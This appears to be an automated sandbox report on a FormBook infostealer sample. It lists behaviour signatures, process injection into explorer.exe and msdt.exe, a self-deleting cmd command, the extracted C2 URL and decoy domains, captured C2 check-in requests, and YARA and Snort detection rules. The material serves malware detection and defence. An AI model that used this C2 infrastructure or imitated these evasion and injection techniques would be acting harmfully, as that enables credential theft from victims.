Loading ...

Play interactive tourEdit tour

Windows Analysis Report S9yf6BkjhTQUbHE.exe

Overview

General Information

Sample Name:S9yf6BkjhTQUbHE.exe
Analysis ID:528622
MD5:812861ad5cbb91bfa01a6a15c2cef128
SHA1:ca092e52319047d609cb6fcca1821a8f873416df
SHA256:a649d216b55b0f0597a16690b8469b6b44b9cdc73560d8237387b2df225ab20b
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • S9yf6BkjhTQUbHE.exe (PID: 6344 cmdline: "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe" MD5: 812861AD5CBB91BFA01A6A15C2CEF128)
    • S9yf6BkjhTQUbHE.exe (PID: 6408 cmdline: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe MD5: 812861AD5CBB91BFA01A6A15C2CEF128)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • msdt.exe (PID: 6472 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6572 cmdline: /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.peptidepowder.com/czh8/"], "decoy": ["ekkyo-business.com", "anamentor.com", "criptodigital.online", "smart-device.tech", "piano-tomimoto.com", "sergiojuradomunera.com", "xn----pl8a630b0whm6t.com", "exploitslozdz.xyz", "peregorodki.store", "authenticationtd.net", "ichelbrousset.com", "amboyshops.com", "hengtaigyl.com", "iliubo.com", "overtimersanonymous.com", "crimsonrangellc.com", "otterburnelanding.com", "ping-ken.info", "belezaweb.digital", "elementkultury.com", "heireply.xyz", "membranbakar.xyz", "babygirlletsheal.com", "alpe.paris", "fuslonnd.com", "massaora.com", "geatarotista.com", "namethatsetup.com", "igdxir.com", "tokatyapimarket.com", "soundnox.com", "ase3baeb4p.com", "uniteddatavault.com", "savageequipment.biz", "cutos2.com", "thietketrangtrinhacua.store", "mways-vintage.com", "cloudscapephotos.com", "padelscuolaroma.store", "medeiros.store", "green-umbrella.academy", "kobaran.com", "ilmkibahar.com", "blueworldaquariums.com", "bigjohnblues.com", "e2adriasec.online", "pufaawareskincare.com", "sumerchemicals.com", "epubgame.net", "nuditecouverte.com", "tbpadvogados.website", "cryptoentering.com", "dahliahearing.com", "annellata.xyz", "barberking.online", "cpw882.com", "dock-weiler.com", "dianyuwang.com", "fitpromax.xyz", "deckingtoronto.com", "boundlessentgroup.com", "metricwombat.com", "emergencyhomerepairnetwork.com", "fullerhomeloans.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
        • 0x16b18:$sqlite3text: 68 38 2A 90 C5
        • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
        1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6472

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.peptidepowder.com/czh8/"], "decoy": ["ekkyo-business.com", "anamentor.com", "criptodigital.online", "smart-device.tech", "piano-tomimoto.com", "sergiojuradomunera.com", "xn----pl8a630b0whm6t.com", "exploitslozdz.xyz", "peregorodki.store", "authenticationtd.net", "ichelbrousset.com", "amboyshops.com", "hengtaigyl.com", "iliubo.com", "overtimersanonymous.com", "crimsonrangellc.com", "otterburnelanding.com", "ping-ken.info", "belezaweb.digital", "elementkultury.com", "heireply.xyz", "membranbakar.xyz", "babygirlletsheal.com", "alpe.paris", "fuslonnd.com", "massaora.com", "geatarotista.com", "namethatsetup.com", "igdxir.com", "tokatyapimarket.com", "soundnox.com", "ase3baeb4p.com", "uniteddatavault.com", "savageequipment.biz", "cutos2.com", "thietketrangtrinhacua.store", "mways-vintage.com", "cloudscapephotos.com", "padelscuolaroma.store", "medeiros.store", "green-umbrella.academy", "kobaran.com", "ilmkibahar.com", "blueworldaquariums.com", "bigjohnblues.com", "e2adriasec.online", "pufaawareskincare.com", "sumerchemicals.com", "epubgame.net", "nuditecouverte.com", "tbpadvogados.website", "cryptoentering.com", "dahliahearing.com", "annellata.xyz", "barberking.online", "cpw882.com", "dock-weiler.com", "dianyuwang.com", "fitpromax.xyz", "deckingtoronto.com", "boundlessentgroup.com", "metricwombat.com", "emergencyhomerepairnetwork.com", "fullerhomeloans.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: S9yf6BkjhTQUbHE.exeReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: S9yf6BkjhTQUbHE.exe, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 4x nop then pop edi1_2_004162EC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 4x nop then pop edi1_2_0040C41D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi18_2_008E62EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi18_2_008DC41D

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49827 -> 34.117.168.233:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49827 -> 34.117.168.233:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49827 -> 34.117.168.233:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49837 -> 198.54.117.218:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49837 -> 198.54.117.218:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49837 -> 198.54.117.218:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.xn----pl8a630b0whm6t.com
          Source: C:\Windows\explorer.exeDomain query: www.epubgame.net
          Source: C:\Windows\explorer.exeNetwork Connect: 23.106.123.249 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.178.31 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.anamentor.com
          Source: C:\Windows\explorer.exeDomain query: www.fuslonnd.com
          Source: C:\Windows\explorer.exeDomain query: www.annellata.xyz
          Source: C:\Windows\explorer.exeDomain query: www.metricwombat.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.annellata.xyz
          Source: DNS query: www.exploitslozdz.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.peptidepowder.com/czh8/
          Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L HTTP/1.1Host: www.anamentor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.106.123.249 23.106.123.249
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msdt.exe, 00000012.00000002.519445044.000000000315F000.00000004.00000020.sdmpString found in binary or memory: http://www.xn----pl8a630b0whm6t.com/czh8/?7n=WfBFmY7eHt5QBShHhdd2jwwFQU0Qfs4ciJop7u3ZFFtbwI7iz04mk8i
          Source: msdt.exe, 00000012.00000002.521258705.0000000005332000.00000004.00020000.sdmpString found in binary or memory: https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG
          Source: unknownDNS traffic detected: queries for: www.epubgame.net
          Source: global trafficHTTP traffic detected: GET /czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L HTTP/1.1Host: www.anamentor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.253365121.00000000011E9000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
